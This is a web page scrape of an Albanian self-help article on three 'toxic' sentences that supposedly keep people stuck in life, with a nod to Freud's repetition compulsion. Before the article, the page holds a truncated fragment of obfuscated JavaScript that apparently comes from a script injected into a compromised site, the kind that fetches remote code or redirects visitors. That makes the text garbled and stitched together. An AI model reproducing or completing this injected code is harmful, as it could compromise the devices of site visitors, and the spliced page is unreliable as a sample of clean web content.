;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Këto tri fjali që i thoni po ju bëjnë të ngecni në jetë!

By

Këto fjali ndoshta nuk duhet të thuhen në asnjë moment dhe askund.

Disa fraza tregojnë gjykim të dobët, të tjerat janë thjesht pa vend. Disa të tjera nënkuptojnë se jeni dembel ose thjesht po flisni për t’u dëgjuar.

Është një kategori fjalish që shpesh konsiderohen si toksike dhe terapistët sugjerojnë të mos përdoren.

Këshilla ime është që të zhdukni përgjithmonë frazat e mëposhtme nga fjalori juaj.

  1. 1. “Unë jam gjithmonë si i huaj apo i përjashtuar.” – Ju po parashikoni refuzim në situata sociale dhe gjasat janë që kjo të ndodhë, sepse ju pa kuptuar, po shkoni me këtë “synim” në nënvetëdijën tuaj.
  2. “Nuk i besoj dot askujt.” – Ju e distanconi veten nga të tjerët, shmangni intimitetin dhe izoloni veten. Rrjedhimisht, nuk do t’i besoni askujt sepse nuk po ia jepni këtë mundësi vetes dhe personit tjetër.
  3. “Të gjithë më braktisin.” – Ju shihni potencialin për t’u lënduar në çdo marrëdhënie. Mendoni se të qenit i afërt me dikë do të përfundojë keq, prandaj “e lini fare”.

Çdo mendim toksik përjetëson të njëjtin rezultat të pakënaqshëm, një fenomen që Sigmond Freud e quajti “detyrim i përsëritjes”. Me fjalë të tjera, ju përsërisni atë që është e njohur, edhe nëse është e pashëndetshme.

Artikuj të ngjashëm